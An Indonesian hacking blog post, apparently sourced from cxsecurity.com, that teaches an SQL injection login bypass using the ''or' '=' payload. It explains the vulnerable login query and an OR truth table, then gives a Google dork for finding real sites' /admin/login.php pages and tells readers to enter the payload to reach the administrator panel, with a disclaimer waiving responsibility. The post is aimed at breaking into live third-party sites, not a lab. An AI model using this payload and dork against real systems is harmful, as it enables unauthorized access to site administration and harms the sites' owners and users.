Lama ane nggak pos di blog :(
Sekarang saya mau mengajarkan hal sederhana saja, kebetulan lihat ada targetan..
Disclaimer
Apa yang anda lakukan adalah tanggung jawab anda sendiri, saya tidak ikut ikutan dan tidak akan bertanggungjawab terhadap apa yang anda lakukan.Bypass admin
Bisa dilakukan dengan hanya bermodalkan logika sql sederhana.Pahami dasarnya
Misal dalam membuat form login kita menggunakan perintah sql seperti ini :select * from admin where username = 'masukan_dari_php' and password = 'masukan_dari_php';
Jika username dan password yang di masukkan ada dalam database, dan mengembalikan nilai true maka script php akan memberikan session dan kita bisa membuka page admin.
Sekarang, bagaimana jika kita ubah dengan perintah or
select * from admin where username = ''or' '='' and password = ''or' '='';
Perintah or akan mengakibatkan pengembalian nilai true dalam username dan password oleh sql. Dan akhirnya kita juga bisa masuk ke page admin juga.
Sudah tahukan darimana 'or' '=' berasal :)
Bagi yang lupa seperti ini tabel kebenaran or
X Y Z
------------------
T T T
T F T
F T T
F F F
T = true
F = False
Dorking
intitle:"後端管理員" /admin/login.phpMaaf jika suatu saat ketika anda membaca tutorial ini, celah sudah di tutup.
Bypass admin
Masukkan saja username dan password dengan :'or' '='
Dan kamu masuk ke administrator.
Oke tutor selesai :)
Source : cxsecurity.com
Thanks To : Allah Rabb Semesta Alam
0 Comments
